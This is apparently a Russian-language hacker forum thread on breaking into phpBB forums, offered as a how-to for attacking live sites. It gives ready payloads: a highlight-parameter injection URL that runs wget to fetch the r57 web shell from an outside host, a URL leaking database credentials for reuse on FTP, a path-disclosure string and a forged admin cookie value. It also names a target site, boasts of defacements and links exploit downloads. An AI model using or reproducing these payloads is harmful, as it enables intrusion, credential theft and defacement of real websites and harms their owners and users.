• XSS.stack #1 – первый литературный журнал от юзеров форума

Phpbb-обзор дырок

c31337

(L3) cache
Пользователь
Регистрация
31.12.2004
Сообщения
156
Реакции
2
И вновь мы ломаем форум.
Сейчас я расскажу об багах одного из самых популярных в России(и не только) форума на одном из самых дырявых даижков:PHPBb. Щас я расскажу как ломать форумы PHPBB(любой версии ниже 2.0.11 но выше 2.0.0) Я выбрал баги в более новых версиях, потому что про старые рассказывать не интересно(не на чем попрактиковаться). Сначало выберем "жертву". Не выбирайте жертву набирая в поисковике чтото вроде "powered by PHPBB", так как все что там можно было найти при помощи поисковиков уже было взломано мной или другими не менее заинтересованными лицами(во, сказал). Если короче, то вам остается расчитывать только на форумы, которые не занесены в поисковую систему по строчке "powered by PHPBB". Узнать такой форум можно по строке(опять) "Powered By PHPbb" и большому значку(не всегда он там есть) "PHPBB" в топе форума. Как кто-то может быть заметил я буду описывать(несложно догадаться) SQL Injection:):):):):):) Ну так вот я выбрал http:www.casinojapan.net/phpbb/
Формипуем запрос(тоьлко не надо спрашивать "как?"-книжки читать нада)такого вида:
viewtopic.php?xxx=wget%20http://www.http://www.italylink.com/store/cart/catalog/
images/winux/r57.php&t=69&highlight=%2527.system($_GET[xxx]).include%2527 таким образом мы закачиваем в папку форума скрипт, который является веб-шеллом. Ну в общем потом его запускаем и всем управляем.
=================================================
Бага номер 2:
Бага это опять(кричим хором!) SQL INJECTION
Это в общем старая бага, но она по новому используется.
Пример такой:http://ссылка на форум/viewtopic.php?p=номер поста&highlight=%2527.$poster=$dbpasswd.%2527 - это дает пасс на базу данных если изменить параметр dbpasswd на dbuser или dbhost то получим соответственно имя пользователя и хост на котором база лежит. Но помня, что пасс на базу часто подходит и на фтп, мы догадываемся, что можно сделать.Правда?...
Ну вот в общем-то и все удачи всем. Правда такие форумы почти(почти!!!!) запатчили.
Советую использовать второй баг так как он хорошо изучен и надежен:):):)
=================================================
article by c31337
 
Уязвимые Версии: phpBB 2.0.12
Воздействие: Полное раскрытие пути
Explotation:
phpBB/viewtopic.php?p=6&highlight=\[HaCkZaTaN]
И вы получите сообщение подобное этому:
Warning: Compilation failed: missing terminating ] for
character class at offset 20 in /home/nst/forum/viewtopic.php(1110) :
regexp code on line 1
Это может дать нам полное раскрытие пути.
Вот что ещё было замечено в HighLight Variable:
[Start Vuln Code ]
1106: if ($highlight_match)
1107: {
1108: // This was shamelessly 'borrowed' from volker at multiartstudio dot de
1109: // via php.net's annotated manual
1110: $message = str_replace('\"', '"', substr(preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se',
"preg_replace('#\b(" . $highlight_match . ")\b#i', ' . $theme['fontcolor3'] . "\">\\\\1', '\\0')", '>' . $message
. '<'), 1, -1));
1111: }

[ Ends Vulns Code ]
не заимствуют stuff lol.

Следующая вещь была замечена в php.ini

magic_quotes_gpc = On
magic_quotes_sybase = Off

Вы должны включить их оба
 
Уязвимая версия: >= 2.0.12
Данный баг осуществляетса сплоитом...
Для это нужен браузера FireFox или Mozilla
Эксплоит перезаписывает данные из кук и меняет UID пользователя на UID админа тем не менее мы получаем уровень АДМИНА.

ТОесть компиллим сплоит, делаем exe запускаем FireFox или Mozilla
заходим на форум запускаем сплоит и становимся админом!!!
Проверено!
Сплойт: http://www.webxss.net/sploits/phpBBbugs.rar
 
Не такая уж и новая бага в phpbb с подменой куков.
Актуальна для версий с 2.0.6 по 2.0.12 включительно.
Заключается в подмене ваших куков на a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

Это дает нам админские возможности. По взлому снял видюху: http://vietnamwar.ru/winux/phpbb.rar

Убедительная просьбе не дефейсить то что я уже отдефейсил и не ломать того, кото я взломал в видюхе.
 
c31337
Только начал форумные баги изучать спасибо, но так как форум совершенно новый и сюда рвуться самые-самые начинающие, то предлогаю строчку ...

Формипуем запрос(тоьлко не надо спрашивать "как?"-книжки читать нада)


... заменить на описание как это делать, да и тем более многие книжек не имеют :help:
 
Дело в том, что как я щас этим формированием запросов начал заниматься - убедился что это темный лес. Тут нельзя все написать в 2 строчки как ты хош, а книжки - скачать можно...
 
phpBB User id Auth. Bypass and "admin_styles" Code Injection Exploit


Уязвимость позволяет удаленому пользователю получить администартивные привилегии.
Цель эксплоита: phpBB версии до 2.0.12

Скачать эксплоит
Видео по эксплоиту
 
Winux вот я скачал твоё видео сделал так как ты! и нечего не получилось!

чё делать?
Добавлено [time]1120304331[/time]
Winux вот я скачал твоё видео сделал так как ты! и нечего не получилось!

чё делать?
 
s3po
А ты сам попробуй =) Гугл - умный поисковик. Он тебе вместо того, чтобы сказать "НихОчу =)" скажет, что у нас на серваке вирусняк есть, пойди пока адсюль, хлопче, без тебя проблем по горло. Короче, не исчет он такие вещи =)
 
Значит баги таковой уже нет.
Ищи powered by phpbb 2.0.6 в гугле и тесть.
Да, имхо тупой совет, сам бы сначала попробовал...
Добавлено [time]1120327617[/time]
Вот Яндекс тупой, там все найдет, поэтому и "Яndex: найдется все!"....
 
Есть баг на highlight. Типа работает на версиях <=2.0.15. Но т.к. он перекрывается вставкой 5-6 символов, то может быть перекрыт вручную.

З.Ы. s3po, почему сразу рот затыкаешь? Ну а если у меня не ищет?
 
сплоит на перле в журнале от мазафаки есть для 2.0.15...

Привет.
Линку не кинешь, если не в лом? Или в ЛыСы или тут, а?

Звиняйте, вопрос отпал. Нашел. Именно в журнале. Во оформление журналов стали делать, едрёныть...
 
david_

не позорься, кого там объяснять-то и так всё ясно, а тем кому не ясно пусть мнуал в зубы берут, ибо ######!

Иначе это будет похоже на то как один кыдыс вы**ываца перед другими кыдысами... ЛООООООООЛ
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх